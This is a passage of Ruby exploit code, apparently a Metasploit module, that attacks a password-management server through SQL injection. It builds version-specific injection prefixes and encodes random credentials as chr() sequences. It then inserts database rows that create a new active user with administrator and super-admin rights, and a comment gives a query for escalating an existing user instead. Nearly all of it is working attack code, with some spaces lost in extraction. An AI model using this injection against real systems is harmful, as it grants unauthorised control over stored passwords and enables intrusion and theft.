# 5th step: get the c ookies sent in the last response
returnres.get_cookies
end
end
end
returnnil
end
definject_sql(old_style)
# On versions older than 7000 the injection is slightly different (we call it "old style").
# For "new style" versions we can escalate to super admin by doing
# "update aaaauthorizedrole set role_id=1 where account_id=#{user_id};insert into ptrx_superadmin values (#{user_id},true);"
# However for code simplicity let's just create a brand new user which works for both "old style" and "new style" versions.
ifold_style
sqli_prefix='\\\'))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") as '+Rex::Text.rand_text_alpha_lower(rand(8)+3)+";"
else
sqli_prefix='\\\'))))) GROUP BY "PTRX_RID","PTRX_AID","PTRX_RNAME","PTRX_DESC","DOMAINNAME","PTRX_LNAME","PTRX_PWD","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24","A1","A2","A3","A4","A5","A6","A7","A8","A9","A10","A11","A12","A13","A14","A15","A16","A17","A18","A19","A20","A21","A22","A23","A24","PTRX_NOTES") AS Ptrx_DummyPwds GROUP BY "PTRX_RID","PTRX_RNAME","PTRX_DESC","PTRX_ATYPE","PTRX_DNSN","PTRX_DEPT","PTRX_LOTN","PTRX_OSTYPE","PTRX_RURL","C1","C2","C3","C4","C5","C6","C7","C8","C9","C10","C11","C12","C13","C14","C15","C16","C17","C18","C19","C20","C21","C22","C23","C24") as '+Rex::Text.rand_text_alpha_lower(rand(8)+3)+";"
end
user_id=Rex::Text.rand_text_numeric(4)
time=Rex::Text.rand_text_numeric(8)
username=Rex::Text.rand_text_alpha_lower(6)
username_chr=""
username.each_chardo|c|
username_chr<<'chr('<<c.ord.to_s<<')||'
end
username_chr.chop!.chop!
password=Rex::Text.rand_text_alphanumeric(10)
password_chr=""
password.each_chardo|c|
password_chr<<'chr('<<c.ord.to_s<<')||'
end
password_chr.chop!.chop!
group_chr=""
'Default Group'.each_chardo|c|
group_chr<<'chr('<<c.ord.to_s<<')||'
end
group_chr.chop!.chop!
sqli_command=
"insert into aaauser values (#{user_id},$$$$,$$$$,$$$$,#{time},$$$$);"+
"insert into aaapassword values (#{user_id},#{password_chr},$$$$,0,2,1,#{time});"+
"insert into aaauserstatus values (#{user_id},$$ACTIVE$$,#{time});"+
"insert into aaalogin values (#{user_id},#{user_id},#{username_chr});"+
"insert into aaaaccount values (#{user_id},#{user_id},1,1,#{time});"+
"insert into aaaauthorizedrole values (#{user_id},1);"+
"insert into aaaaccountstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});"+
"insert into aaapasswordstatus values (#{user_id},-1,0,$$ACTIVE$$,#{time});"+
"insert into aaaaccadminprofile values (#{user_id},$$"+Rex::Text.rand_text_alpha_upper(8)+"$$,-1,-1,-1,-1,-1,false,-1,-1,-1,$$$$);"+
"insert into aaaaccpassword values (#{user_id},#{user_id});"+
"insert into ptrx_resourcegroup values (#{user_id},3,#{user_id},0,0,0,0,#{group_chr},$$$$);"+
"insert into ptrx_superadmin values (#{user_id},true);"
